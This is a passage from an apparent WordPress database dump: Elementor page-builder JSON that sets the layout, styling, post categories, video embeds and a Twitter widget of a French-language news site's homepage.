section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3097,926,'_elementor_version','0.4'),(3098,926,'_elementor_css','a:3:{s:4:\"time\";i:1511347758;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3100,927,'_elementor_edit_mode','builder'),(3101,927,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"